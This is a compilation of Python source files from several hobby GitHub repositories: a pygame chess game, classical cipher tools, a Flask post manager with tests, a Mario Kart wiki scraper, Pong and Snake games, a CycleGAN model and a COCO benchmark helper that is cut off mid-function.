KY, KX = GetIndexFromCell(SourceKing)
if DX < KX:
SourceCastle = Board[KY][0]
else:
SourceCastle = Board[KY][7]
CY, CX = GetIndexFromCell(SourceCastle)
if abs(KX-CX) == 4:
Board[KY][KX+2].SetContainedPiece(SourceKing.GetContainedPiece())
Board[CY][CX-3].SetContainedPiece(SourceCastle.GetContainedPiece())
else:
Board[KY][KX-2].SetContainedPiece(SourceKing.GetContainedPiece())
Board[CY][CX+2].SetContainedPiece(SourceCastle.GetContainedPiece())
print(Board[KY][KX-2].GetContainedPiece().GetName())
SourceKing.SetContainedPiece(None)
SourceCastle.SetContainedPiece(None)
def GetCanMove(PlayerTurn):
for i in range(8):
for j in range(8):
Piece = Board[i][j].GetContainedPiece()
if Piece != None:
if Piece.GetColor() == PlayerTurn:
ValidMoves = Piece.GetDestinations(PlayerTurn,Board[i][j])
if len(ValidMoves) > 0:
return True
return False
def InCheckMate(Player,PlayerTurn):
for i in range(8):
for j in range(8):
Piece = Board[i][j].GetContainedPiece()
if Piece != None:
#if Piece.GetName() == "King":
if Piece.GetColor() == PlayerTurn:
ValidMoves = Piece.GetDestinations(PlayerTurn,Board[i][j])
ValidMoves = FilterUnCheckMoves(Board[i][j],ValidMoves,Player)
if len(ValidMoves) != 0:
return False
return True
def FilterUnCheckMoves(Source,ValidMoves,Player):
NewValidMoves = []
for Dest in ValidMoves:
TempTaken = None
if Dest.GetContainedPiece() != None:
TempTaken = Dest.GetContainedPiece()
Move(Source,Dest)
if Player.IsInCheck() == False:
NewValidMoves.append(Dest)
Move(Dest,Source)
if TempTaken != None:
Dest.SetContainedPiece(TempTaken)
return NewValidMoves
#__________________________________#
def Render(ShowValidDests=False,ValidDests=[],Check=False,Checkmate=False):
app.getScreen().fill(WHITE)
ShowBoard()
ShowPieces()
if ShowValidDests == True:
for Cell in ValidDests:
pygame.draw.circle(app.getScreen(),GREEN,(Cell.GetX()+(Cell.GetWidth()//2),Cell.GetY()+(Cell.GetHeight()//2)),5)
if Game.GetTurn() == "White":
PlayerOneColor = GREEN
PlayerTwoColor = BLACK
elif Game.GetTurn() == "Black":
PlayerOneColor = BLACK
PlayerTwoColor = GREEN
pg.renderText("White",20,PlayerOneColor,25,app.getHeight()-35,app.getScreen())
pg.renderText("Black",20,PlayerTwoColor,app.getWidth()-75,app.getHeight()-35,app.getScreen())
if Check == True and Checkmate == False:
pg.renderText("Check",20,RED,(app.getWidth()//2)-50,app.getHeight()-35,app.getScreen())
elif Checkmate == True:
pg.renderText("Checkmate",20,RED,(app.getWidth()//2)-75,app.getHeight()-35,app.getScreen())
pygame.display.update()
app.Tick()
def Events():
for event in pygame.event.get():
if event.type == pygame.QUIT:
app.exit()
def MenuRender():
app.getScreen().fill(WHITE)
pg.renderText("Chess",50,BLACK,(app.getWidth()//2)-70,35,app.getScreen())
New = pg.renderText("New game",30,BLACK,(app.getWidth()//2)-150,(app.getHeight()//2),app.getScreen())
Load = pg.renderText("Load game",30,BLACK,(app.getWidth()//2)+20,(app.getHeight()//2),app.getScreen())
pygame.display.update()
return New, Load
def Menu():
while True:
New, Load = MenuRender()
for event in pygame.event.get():
if event.type == pygame.QUIT:
app.exit()
elif event.type == pygame.MOUSEBUTTONDOWN:
mx, my = pygame.mouse.get_pos()
if New.collidepoint(mx,my):
return "NEW"
elif Load.collidepoint(mx,my):
return "LOAD"
def Main():
app.begin()
GameMode = Menu()
SetBoard()
if GameMode == "NEW":
SetPieces('default.txt')
elif GameMode == "LOAD":
SetPieces('save_game.txt')
GameOver = False
while not GameOver:
Render()
if Game.GetTurn() == "White":
Status = Turn(PlayerOne)
else:
Status = Turn(PlayerTwo)
if Status == "Game Over":
GameOver = True
Game.SwitchTurn()
while True:
Render(Check=True,Checkmate=True)
Events()
if __name__ == "__main__":
app = pg.App(400,450,16,"Chess")
Board = [[BoardCell() for i in range(8)] for dimensions in range(8)]
Game = GameClass()
PlayerOne = PlayerClass("White")
PlayerTwo = PlayerClass("Black")
Main()
``` |
{
"source": "jj-style/Cryptobreaker",
"score": 3
} |
#### File: Cryptobreaker/Source/Autokey.py
```python
from Vigenere import *
from RemovePunctuation import *
import string
alphabet = string.ascii_lowercase
def AutokeyEncode(plaintext,key):
key = key + plaintext
return VigenereEncode(plaintext,key)
def AutokeyDecode(ciphertext,key):
key = list(key)
plaintext = ""
for i in range(len(ciphertext)):
if ciphertext[i] in alphabet:
current_key = key.pop(0)
plaintext_letter = VigenereDecode(ciphertext[i],current_key)
key.append(plaintext_letter)
else:
plaintext_letter = ciphertext[i]
plaintext += plaintext_letter
return plaintext
```
#### File: Cryptobreaker/Source/Beaufort.py
```python
import string
from RemovePunctuation import *
alphabet = list(string.ascii_lowercase)
def BeaufortEncode(text,key,german=False):
ciphertext = ""
text_count = 0
key_count = 0
while text_count < len(text):
if text[text_count] in alphabet:
if not german:
ciphertext += alphabet[(alphabet.index(key[key_count%len(key)]) - alphabet.index(text[text_count])) % len(alphabet)]
elif german:
ciphertext += alphabet[(alphabet.index(text[text_count]) - alphabet.index(key[key_count%len(key)])) % len(alphabet)]
text_count += 1
key_count += 1
else:
ciphertext += text[text_count]
text_count += 1
return ciphertext
def BeaufortDecode(text,key,german=False):
plaintext = ""
text_count = 0
key_count = 0
while text_count < len(text):
if text[text_count] in alphabet:
if not german:
plaintext += alphabet[(alphabet.index(key[key_count%len(key)]) - alphabet.index(text[text_count])) % len(alphabet)]
elif german:
plaintext += alphabet[(alphabet.index(text[text_count]) + alphabet.index(key[key_count%len(key)])) % len(alphabet)]
text_count += 1
key_count += 1
else:
plaintext += text[text_count]
text_count += 1
return plaintext
```
#### File: Cryptobreaker/Source/FrequencyAnalysis.py
```python
import string
alphabet = list(string.ascii_lowercase)
def FrequencyAnalysis(text):
analysis = []
for letter in alphabet:
analysis.append([letter,0])
for letter in text:
if letter in alphabet:
analysis[alphabet.index(letter)][1] += 1
return analysis
def LetterFrequencyAnalysis(text):
most_common = 'etaoinshrdlcumwfgypbvkjxqz'
letter_freq = {}
for letter in text:
if letter in alphabet:
if letter not in letter_freq:
letter_freq[letter] = 1
else:
letter_freq[letter] += 1
for letter in alphabet:
if letter not in letter_freq:
letter_freq[letter] = 0
sorted_letter_freq = sorted(letter_freq.items(), key=lambda x: x[1],reverse=True)
return sorted_letter_freq
```
#### File: Cryptobreaker/Source/RemovePunctuation.py
```python
import string
punctuation = string.punctuation + "’" + '“' + "‘" + "—"
def RemovePunctuation(text,remove_spaces=True,to_lower=True):
text = list(text)
while "\n" in text:
text.remove("\n")
text = "".join(text)
if remove_spaces:
text = text.replace(" ","")
if to_lower:
text=text.lower()
for letter in text:
if letter in punctuation:
text = text.replace(letter,"")
text = text.strip("\n")
return text
``` |
{
"source": "jj-style/FlaskReactTemplateApp",
"score": 3
} |
#### File: facades/post/naiive_post_manager.py
```python
from .post_manager import PostManager
from app.data import post_response, posts_response, new_post_request
class NaiivePostManager(PostManager):
def __init__(self):
self.posts = []
def list_posts(self):
return posts_response.dump(self.posts)
def get_post_by_id(self, id):
p = next((p for p in self.posts if p["id"] == id), None)
if not p:
return "Not Found", 404
else:
return post_response.dump(p)
def create_post(self, req):
post = new_post_request.load(req)
ids = [p.id for p in self.posts]
if len(ids) == 0:
ids = [-1]
new_post = {
**post,
**{"id": max(ids) + 1, "slug": post["title"].replace(" ", "-").lower()},
}
self.posts.append(new_post)
return new_post, 201
def get_post_by_slug(self, slug: str):
p = next((p for p in self.posts if p.get("slug", "") == slug), None)
if not p:
return "Not Found", 404
else:
return post_response.dump(p)
```
#### File: facades/post/test_post_manager.py
```python
import pytest
from .post_factory import PostFactory
from .post_manager import PostManager
@pytest.fixture(scope="module")
def naiive_post_manager() -> PostManager:
f = (PostFactory()).set_type("NAIIVE")
return f.new()
def test_list_no_posts_happy(naiive_post_manager: PostManager):
res = naiive_post_manager.list_posts()
assert type(res) == list
assert len(res) == 0
def test_get_post_by_id_404(naiive_post_manager: PostManager):
res = naiive_post_manager.get_post_by_id("randomid_that_doesnt_exist")
assert 404 in res
def test_create_post(naiive_post_manager: PostManager):
res = naiive_post_manager.create_post({"title": "my post", "body": "body of post"})
assert 201 in res
def test_get_by_id(naiive_post_manager: PostManager):
res = naiive_post_manager.get_post_by_id(0)
assert type(res) == dict
assert res.get("title") == "my post"
assert res.get("body") == "body of post"
def test_get_by_slug(naiive_post_manager: PostManager):
res = naiive_post_manager.get_post_by_slug("my-post")
assert type(res) == dict
assert res.get("title") == "my post"
assert res.get("body") == "body of post"
``` |
{
"source": "jj-style/MarioKartCharVecComp",
"score": 3
} |
#### File: jj-style/MarioKartCharVecComp/mario_kart.py
```python
import requests
import bs4 as bs
def get_content_from_url(url):
r = requests.get(url)
soup = bs.BeautifulSoup(r.content,'lxml')
return soup
def get_character_bonuses(soup):
tables = soup.find_all("table",class_="wikitable")
for table in tables:
header = table.find("tr")
if header.get_text().strip() == "Character Bonuses":
break
rows = table.find_all("tr")
rows.pop(0)
headings_temp = rows.pop(0).find_all("th")
data = []
headings = []
for h in headings_temp:
headings.append(h.get_text().strip())
data.append(headings)
sizes = get_character_sizes(soup)
small = []
medium = []
large = []
for row in rows:
name = row.find("th").get_text().strip()
stats = [x.get_text().strip() for x in row.find_all("td")]
for i in range(len(stats)):
if stats[i] == '-':
stats[i] = '0'
stats = list(map(int,stats))
if name in sizes["S"]:
small.append([name] + stats)
elif name in sizes["M"]:
medium.append([name] + stats)
elif name in sizes["L"]:
large.append([name] + stats)
data.append(small)
data.append(medium)
data.append(large)
return data
def get_character_sizes(soup):
gal_text = soup.find_all("div", class_="gallerytext")
sizes = {"S":[],"M":[],"L":[]}
for t in gal_text:
name = t.find("a").get_text()
if "Small" in t.get_text():
sizes["S"].append(name)
elif "Medium" in t.get_text():
sizes["M"].append(name)
elif "Large" in t.get_text():
sizes["L"].append(name)
return sizes
def get_vehicle_stats(soup):
tables = soup.find_all("table",class_="wikitable")
for table in tables:
header = table.find("tr")
if header.get_text().strip() == "Vehicle Stats":
break
rows = table.find_all("tr")
rows.pop(0)
headings_temp = rows.pop(0).find_all("th")
headings = []
data = []
for h in headings_temp:
headings.append(h.get_text().strip())
data.append(headings[:8])
small = []
medium = []
large = []
current_heading = headings[0]
for row in rows:
row_data = row.find_all("td")
if row_data != []:
row_data[0] = row_data[0].get_text().strip()
for i in range(1,8):
datum = row_data[i].get_text()
if datum == "-":
row_data[i] = 0
else:
row_data[i] = int(datum)
if "Small" in current_heading:
small.append(row_data[:8])
elif "Medium" in current_heading:
medium.append(row_data[:8])
elif "Large" in current_heading:
large.append(row_data[:8])
else:
current_heading = (row.find("th").get_text())
data.append(small)
data.append(medium)
data.append(large)
return data
def all_char_vec_combos(c,v):
cross_join = []
for j in range(3):
characters = c[j]
vehicles = v[j]
for char in characters:
for vehic in vehicles:
cross = []
cross.append(char[0] + " in " + vehic[0])
for i in range(1,len(char)):
cross.append(char[i] + vehic[i])
cross_join.append(cross)
return cross_join
def get_data():
mario_kart_wiki_url = "https://www.mariowiki.com/Mario_Kart_Wii"
soup = get_content_from_url(mario_kart_wiki_url)
char_bonuses = get_character_bonuses(soup)
headings = (char_bonuses[0])
headings[0] += ",Vehicle"
v_stats = get_vehicle_stats(soup)
c = all_char_vec_combos(char_bonuses[1:], v_stats[1:])
#drift_sorted = sorted(c,key=lambda x: (x[headings.index("Drift")], x[headings.index("Mini-Turbo")], x[headings.index("Speed")]),reverse=True)
return headings, c
``` |
{
"source": "jj-style/Pong",
"score": 4
} |
#### File: jj-style/Pong/pygame_setup.py
```python
import pygame
from tkinter import *
import tkinter.messagebox
#App class for pygame window
class App():
#Pass width, height, tickspeed and caption of window to constructor
def __init__(self,width,height,tickSpeed,caption):
self.screenx = width
self.screeny = height
self.tickSpeed = tickSpeed
self.caption = caption
self.screen = None
self.clock = None
#Call begin to actually initialise pygame and set the display and clock etc.
def begin(self):
pygame.init()
pygame.mixer.quit()
pygame.display.set_caption(self.caption)
self.screen = pygame.display.set_mode((self.screenx, self.screeny))
self.clock = pygame.time.Clock()
#Exit pygame and python
def exit(self):
pygame.quit()
quit()
#Return tickspeed of the clock
def getTickSpeed(self):
return self.tickspeed
#Set a new tickspeed for the clock
def setTickSpeed(self,newTickSpeed):
self.tickSpeed = newTickSpeed
#Return the clock object
def getClock(self):
return self.clock
#Tick the clock at the current tickspeed
def Tick(self):
self.clock.tick(self.tickSpeed)
#Return the surface
def getScreen(self):
return self.screen
#Return the width of the screen
def getWidth(self):
return self.screenx
#Return the height of the screen
def getHeight(self):
return self.screeny
#Render text function to blit text to surface
#Pass the text, the font size, the colour, x coordinate, y coordinate, surface to blit to
#Surface is App.getScreen()
def renderText(text,fontSize,colour,x,y,surface):
font = pygame.font.SysFont("monospace", fontSize)
text = surface.blit((font.render(text, 1, colour)),(x,y))
return text
#Save an image of the surface
#Pass the surface (App.getScreen())
def saveImage(surface):
root = Tk()
root.withdraw()
#Tkinter popup box asking if the user wishes to save an image of the screen
response = tkinter.messagebox.askyesno("Save Image","Would you like to save an image of the screen?")
root.update()
if response == True:
#Save an image of the screen
pygame.image.save(surface,"screenshot.png")
else:
return
#Return string of characters on keyboard from pygame.event
def getKey(key):
if key == pygame.K_a: return "a"
elif key == pygame.K_b: return "b"
elif key == pygame.K_c: return "c"
elif key == pygame.K_d: return "d"
elif key == pygame.K_e: return "e"
elif key == pygame.K_f: return "f"
elif key == pygame.K_g: return "g"
elif key == pygame.K_h: return "h"
elif key == pygame.K_i: return "i"
elif key == pygame.K_j: return "j"
elif key == pygame.K_k: return "k"
elif key == pygame.K_l: return "l"
elif key == pygame.K_m: return "m"
elif key == pygame.K_n: return "n"
elif key == pygame.K_o: return "o"
elif key == pygame.K_p: return "p"
elif key == pygame.K_q: return "q"
elif key == pygame.K_r: return "r"
elif key == pygame.K_s: return "s"
elif key == pygame.K_t: return "t"
elif key == pygame.K_u: return "u"
elif key == pygame.K_v: return "v"
elif key == pygame.K_w: return "w"
elif key == pygame.K_x: return "x"
elif key == pygame.K_y: return "y"
elif key == pygame.K_z: return "z"
elif key == pygame.K_0: return "0"
elif key == pygame.K_1: return "1"
elif key == pygame.K_2: return "2"
elif key == pygame.K_3: return "3"
elif key == pygame.K_4: return "4"
elif key == pygame.K_5: return "5"
elif key == pygame.K_6: return "6"
elif key == pygame.K_7: return "7"
elif key == pygame.K_8: return "8"
elif key == pygame.K_9: return "9"
elif key == pygame.K_BACKSPACE: return "backspace"
elif key == pygame.K_SPACE: return "space"
elif key == pygame.K_RETURN: return "return"
elif key == pygame.K_ESCAPE: return "escape"
elif key == pygame.K_UP: return "up"
elif key == pygame.K_DOWN: return "down"
elif key == pygame.K_RIGHT: return "right"
elif key == pygame.K_LEFT: return "left"
``` |
{
"source": "jj-style/Snake",
"score": 4
} |
#### File: jj-style/Snake/snake.py
```python
import pygame
import random
import time
BLACK = (0,0,0)
WHITE = (255,255,255)
RED = (255,0,0)
GREEN = (0,255,0)
snake_block_size = 15
screen_dimensions = 400
while screen_dimensions % snake_block_size != 0:
screen_dimensions += 1
screenx = screen_dimensions
screeny = screen_dimensions
#__________CLASSES__________#
class Game():
def __init__(self):
self.lastKey = "right"
self.food = None
self.score = 0
def setLastKey(self,key):
self.lastKey = key
def getLastKey(self):
return self.lastKey
def spawnFood(self):
validx = False
while not validx:
x = random.randint(0,(screenx-snake_block_size)%screenx)
if x % snake_block_size == 0:
validx = True
validy = False
while not validy:
y = random.randint(0,(screeny-snake_block_size)%screeny)
if y % snake_block_size == 0:
validy = True
self.food = [x,y]
def showFood(self):
return pygame.draw.rect(app.getScreen(),GREEN,(self.food[0],self.food[1],snake_block_size,snake_block_size))
def getFood(self):
return self.food
def increaseScore(self):
self.score += 1
if self.score % 5 == 0:
app.setTickSpeed(app.getTickSpeed()+2)
def showScore(self):
renderText(str(self.score),25,BLACK,25,25)
def getScore(self):
return self.score
class Player():
def __init__(self,starting_length = 5):
self.length = starting_length
self.x = [snake_block_size for i in range(self.length)]
self.y = [snake_block_size for i in range(self.length)]
def show(self):
for i in range(self.length):
pygame.draw.rect(app.getScreen(),RED,(self.x[i],self.y[i],snake_block_size,snake_block_size))
def update(self,direction):
i = self.length -1
while i >= 1:
self.x[i] = self.x[i-1]
self.y[i] = self.y[i-1]
i -= 1
if direction == "right":
self.x[0] = (self.x[0]+(snake_block_size)) % screenx
elif direction == "left":
self.x[0] = (self.x[0]-(snake_block_size)) % screenx
elif direction == "up":
self.y[0] = (self.y[0]-(snake_block_size)) % screeny
elif direction == "down":
self.y[0] = (self.y[0]+(snake_block_size)) % screeny
def getX(self):
return self.x
def getY(self):
return self.y
def getLength(self):
return self.length
def eat(self):
game.increaseScore()
self.length += 1
self.x.append(screenx-1)
self.y.append(screeny-1)
class App():
def __init__(self):
pygame.init()
pygame.mixer.quit()
pygame.display.set_caption('snake')
self.screen = pygame.display.set_mode((screenx, screeny))
self.clock = pygame.time.Clock()
self.tickspeed = 20
def exitGame(self):
pygame.quit()
quit()
def getTickSpeed(self):
return self.tickspeed
def setTickSpeed(self,new_tickspeed):
self.tickspeed = new_tickspeed
def getClock(self):
return self.clock
def getScreen(self):
return self.screen
#__________EVENTS RENDER__________#
def events():
direction = ""
for event in pygame.event.get():
if event.type == pygame.QUIT:
app.exitGame()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT and game.getLastKey() != "right":
direction = "left"
elif event.key == pygame.K_RIGHT and game.getLastKey() != "left":
direction = "right"
elif event.key == pygame.K_UP and game.getLastKey() != "down":
direction = "up"
elif event.key == pygame.K_DOWN and game.getLastKey() != "up":
direction = "down"
if direction != "":
game.setLastKey(direction)
def render():
app.getScreen().fill(WHITE)
player.show()
game.showFood()
game.showScore()
pygame.display.update()
app.getClock().tick(app.getTickSpeed())
def renderText(text,fontSize,colour,x,y):
font = pygame.font.SysFont("monospace", fontSize)
text = app.getScreen().blit((font.render(text, 1, colour)),(x,y))
return text
#__________GAME FUNCTIONS__________#
def eatSnake():
headx = player.getX()[0]
heady = player.getY()[0]
for i in range(1,player.getLength()):
if player.getX()[i] == headx and player.getY()[i] == heady:
return True
return False
def eatFood():
if game.showFood().collidepoint(player.getX()[0],player.getY()[0]):
game.spawnFood()
player.eat()
#__________GAME OVER__________#
def gameOverRender():
app.getScreen().fill(WHITE)
player.show()
game.showFood()
renderText("GAME OVER",30,BLACK,screenx/3,screeny/10)
renderText("Score: {}".format(str(game.getScore())),20,BLACK,screenx/3,screeny/6)
renderText("Press enter to restart",20,BLACK,0.175*screenx,0.75*screeny)
pygame.display.update()
app.getClock().tick(app.getTickSpeed())
def gameOverGetMove(last_choice):
new_choice = last_choice
while new_choice == last_choice:
new_choice = random.choice(["up","down","left","right"])
if last_choice == "up" and new_choice == "down":
new_choice = "up"
elif last_choice == "down" and new_choice == "up":
new_choice = "down"
elif last_choice == "left" and new_choice == "right":
new_choice = "left"
elif last_choice == "right" and new_choice == "left":
new_choice = "right"
return new_choice
def gameOverEvents():
for event in pygame.event.get():
if event.type == pygame.QUIT:
app.exitGame()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
return True
elif event.key == pygame.K_BACKSPACE:
return False
return None
def gameOverScreen():
move = 0
computerChoice = game.getLastKey()
while True:
gameOverRender()
play_again = gameOverEvents()
move += 1
if move % 15 == 0:
computerChoice = gameOverGetMove(computerChoice)
player.update(computerChoice)
eatFood()
if play_again == True:
return True
elif play_again == False:
app.exitGame()
#__________MAIN__________#
def main():
game.spawnFood()
gameOver = False
while not gameOver:
events()
render()
player.update(game.getLastKey())
eatFood()
gameOver = eatSnake()
gameOverScreen()
if __name__ == "__main__":
while True:
app = App()
player = Player() #starting_length=10
game = Game()
main()
``` |
{
"source": "jjSveding/pytorch-CycleGAN-and-pix2pix",
"score": 3
} |
#### File: pytorch-CycleGAN-and-pix2pix/models/cycle_gan_model.py
```python
import torch
import itertools
from util.pytorch_ssim import SSIM
from util.image_pool import ImagePool
from .base_model import BaseModel
from . import networks
class CycleGANModel(BaseModel):
"""
This class implements the CycleGAN model, for learning image-to-image translation without paired data.
The model training requires '--dataset_mode unaligned' dataset.
By default, it uses a '--netG resnet_9blocks' ResNet generator,
a '--netD basic' discriminator (PatchGAN introduced by pix2pix),
and a least-square GANs objective ('--gan_mode lsgan').
CycleGAN paper: https://arxiv.org/pdf/1703.10593.pdf
"""
@staticmethod
def modify_commandline_options(parser, is_train=True):
"""Add new dataset-specific options, and rewrite default values for existing options.
Parameters:
parser -- original option parser
is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.
Returns:
the modified parser.
For CycleGAN, in addition to GAN losses, we introduce lambda_A, lambda_B, and lambda_identity for the following losses.
A (source domain), B (target domain).
Generators: G_A: A -> B; G_B: B -> A.
Discriminators: D_A: G_A(A) vs. B; D_B: G_B(B) vs. A.
Forward cycle loss: lambda_A * ||G_B(G_A(A)) - A|| (Eqn. (2) in the paper)
Backward cycle loss: lambda_B * ||G_A(G_B(B)) - B|| (Eqn. (2) in the paper)
Identity loss (optional): lambda_identity * (||G_A(B) - B|| * lambda_B + ||G_B(A) - A|| * lambda_A) (Sec 5.2 "Photo generation from paintings" in the paper)
Dropout is not used in the original CycleGAN paper.
"""
parser.set_defaults(no_dropout=True) # default CycleGAN did not use dropout
if is_train:
parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')
parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')
parser.add_argument('--lambda_identity', type=float, default=0.5, help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1')
parser.add_argument('--cycle_loss_func', type=str, default='l1', help='Cycle consistency loss function [l1 | ssim]')
return parser
def __init__(self, opt):
"""Initialize the CycleGAN class.
Parameters:
opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseModel.__init__(self, opt)
# specify the training losses you want to print out. The training/test scripts will call <BaseModel.get_current_losses>
self.loss_names = ['D_A', 'G_A', 'cycle_A', 'idt_A', 'D_B', 'G_B', 'cycle_B', 'idt_B']
# specify the images you want to save/display. The training/test scripts will call <BaseModel.get_current_visuals>
visual_names_A = ['real_A', 'fake_B', 'rec_A']
visual_names_B = ['real_B', 'fake_A', 'rec_B']
if self.isTrain and self.opt.lambda_identity > 0.0: # if identity loss is used, we also visualize idt_B=G_A(B) ad idt_A=G_A(B)
visual_names_A.append('idt_B')
visual_names_B.append('idt_A')
self.visual_names = visual_names_A + visual_names_B # combine visualizations for A and B
# specify the models you want to save to the disk. The training/test scripts will call <BaseModel.save_networks> and <BaseModel.load_networks>.
if self.isTrain:
self.model_names = ['G_A', 'G_B', 'D_A', 'D_B']
else: # during test time, only load Gs
self.model_names = ['G_A', 'G_B']
# define networks (both Generators and discriminators)
# The naming is different from those used in the paper.
# Code (vs. paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)
self.netG_A = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
self.netG_B = networks.define_G(opt.output_nc, opt.input_nc, opt.ngf, opt.netG, opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
if self.isTrain: # define discriminators
self.netD_A = networks.define_D(opt.output_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)
self.netD_B = networks.define_D(opt.input_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)
if self.isTrain:
if opt.lambda_identity > 0.0: # only works when input and output images have the same number of channels
assert(opt.input_nc == opt.output_nc)
self.fake_A_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
self.fake_B_pool = ImagePool(opt.pool_size) # create image buffer to store previously generated images
# define loss functions
self.criterionGAN = networks.GANLoss(opt.gan_mode).to(self.device) # define GAN loss.
if(self.opt.cycle_loss_func == "l1"):
self.criterionCycle = torch.nn.L1Loss()
self.criterionIdt = torch.nn.L1Loss()
else:
self.criterionCycle = SSIM()
self.criterionIdt = SSIM()
# initialize optimizers; schedulers will be automatically created by function <BaseModel.setup>.
self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizer_D = torch.optim.Adam(itertools.chain(self.netD_A.parameters(), self.netD_B.parameters()), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers.append(self.optimizer_G)
self.optimizers.append(self.optimizer_D)
def set_input(self, input):
"""Unpack input data from the dataloader and perform necessary pre-processing steps.
Parameters:
input (dict): include the data itself and its metadata information.
The option 'direction' can be used to swap domain A and domain B.
"""
AtoB = self.opt.direction == 'AtoB'
self.real_A = input['A' if AtoB else 'B'].to(self.device)
self.real_B = input['B' if AtoB else 'A'].to(self.device)
self.image_paths = input['A_paths' if AtoB else 'B_paths']
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
self.fake_B = self.netG_A(self.real_A) # G_A(A)
self.rec_A = self.netG_B(self.fake_B) # G_B(G_A(A))
self.fake_A = self.netG_B(self.real_B) # G_B(B)
self.rec_B = self.netG_A(self.fake_A) # G_A(G_B(B))
def backward_D_basic(self, netD, real, fake):
"""Calculate GAN loss for the discriminator
Parameters:
netD (network) -- the discriminator D
real (tensor array) -- real images
fake (tensor array) -- images generated by a generator
Return the discriminator loss.
We also call loss_D.backward() to calculate the gradients.
"""
# Real
pred_real = netD(real)
loss_D_real = self.criterionGAN(pred_real, True)
# Fake
pred_fake = netD(fake.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
# Combined loss and calculate gradients
loss_D = (loss_D_real + loss_D_fake) * 0.5
loss_D.backward()
return loss_D
def backward_D_A(self):
"""Calculate GAN loss for discriminator D_A"""
fake_B = self.fake_B_pool.query(self.fake_B)
self.loss_D_A = self.backward_D_basic(self.netD_A, self.real_B, fake_B)
def backward_D_B(self):
"""Calculate GAN loss for discriminator D_B"""
fake_A = self.fake_A_pool.query(self.fake_A)
self.loss_D_B = self.backward_D_basic(self.netD_B, self.real_A, fake_A)
def backward_G(self):
"""Calculate the loss for generators G_A and G_B"""
lambda_idt = self.opt.lambda_identity
lambda_A = self.opt.lambda_A
lambda_B = self.opt.lambda_B
# Identity loss
if lambda_idt > 0:
# G_A should be identity if real_B is fed: ||G_A(B) - B||
self.idt_A = self.netG_A(self.real_B)
self.loss_idt_A = self.criterionIdt(self.idt_A, self.real_B) * lambda_B * lambda_idt
# G_B should be identity if real_A is fed: ||G_B(A) - A||
self.idt_B = self.netG_B(self.real_A)
self.loss_idt_B = self.criterionIdt(self.idt_B, self.real_A) * lambda_A * lambda_idt
else:
self.loss_idt_A = 0
self.loss_idt_B = 0
# GAN loss D_A(G_A(A))
self.loss_G_A = self.criterionGAN(self.netD_A(self.fake_B), True)
# GAN loss D_B(G_B(B))
self.loss_G_B = self.criterionGAN(self.netD_B(self.fake_A), True)
# Forward cycle loss || G_B(G_A(A)) - A||
self.loss_cycle_A = self.criterionCycle(self.rec_A, self.real_A) * lambda_A
# Backward cycle loss || G_A(G_B(B)) - B||
self.loss_cycle_B = self.criterionCycle(self.rec_B, self.real_B) * lambda_B
# combined loss and calculate gradients
self.loss_G = self.loss_G_A + self.loss_G_B + self.loss_cycle_A + self.loss_cycle_B + self.loss_idt_A + self.loss_idt_B
self.loss_G.backward()
def optimize_parameters(self):
"""Calculate losses, gradients, and update network weights; called in every training iteration"""
# forward
self.forward() # compute fake images and reconstruction images.
# G_A and G_B
self.set_requires_grad([self.netD_A, self.netD_B], False) # Ds require no gradients when optimizing Gs
self.optimizer_G.zero_grad() # set G_A and G_B's gradients to zero
self.backward_G() # calculate gradients for G_A and G_B
self.optimizer_G.step() # update G_A and G_B's weights
# D_A and D_B
self.set_requires_grad([self.netD_A, self.netD_B], True)
self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero
self.backward_D_A() # calculate gradients for D_A
self.backward_D_B() # calculate graidents for D_B
self.optimizer_D.step() # update D_A and D_B's weights
``` |
{
"source": "JJ/swarm-ga-worker",
"score": 2
} |
#### File: JJ/swarm-ga-worker/coco.py
```python
import numpy as np
import worker.bbobbenchmarks as bn
import random
class CoCoData(object):
def __init__(self, dim, function, instance, nbptsevals= 20, nbptsf = 5):
self.evalsTrigger = 1
self.function = function
self.instance = instance
self.lasteval_num = 0
self.fTrigger = np.inf
self.idxFTrigger = np.inf
self.nbptsf = nbptsf
self.idxEvalsTrigger = 0
self.nbptsevals = nbptsevals
self.dim = dim
self.idxDIMEvalsTrigger = 0.
self.nbFirstEvalsToAlwaysWrite = 1
def evalfun(self, algorithm, gen, ngen, fmin, fopt, error, sol,buffr=None,hbuffr=None):
fmin = float(fmin)
fopt = float(fopt)
error = float(error)
self.lasteval_num = self.lasteval_num + int(ngen)
if (self.lasteval_num >= self.evalsTrigger or fmin - fopt < self.fTrigger):
#We must write if we are past the trigger?
if self.lasteval_num >= self.evalsTrigger:
#In order to pass an assertion in DataSet() we add a fake first eval using a random solution
if not buffr:
#buffr.append(self.sprintData(1, algorithm, gen, ngen, fmin, fopt, error, sol))
random_sol = [10. * random.random() - 5 for _ in range(self.dim)]
function = bn.dictbbob[self.function](self.instance)
fval = function(random_sol)
fopt = function.getfopt()
buffr.append(self.sprintData(1, algorithm, gen, ngen, fval, fopt, fopt - fval, random_sol))
buffr.append(self.sprintData(self.lasteval_num, algorithm, gen, ngen, fmin, fopt, error, sol))
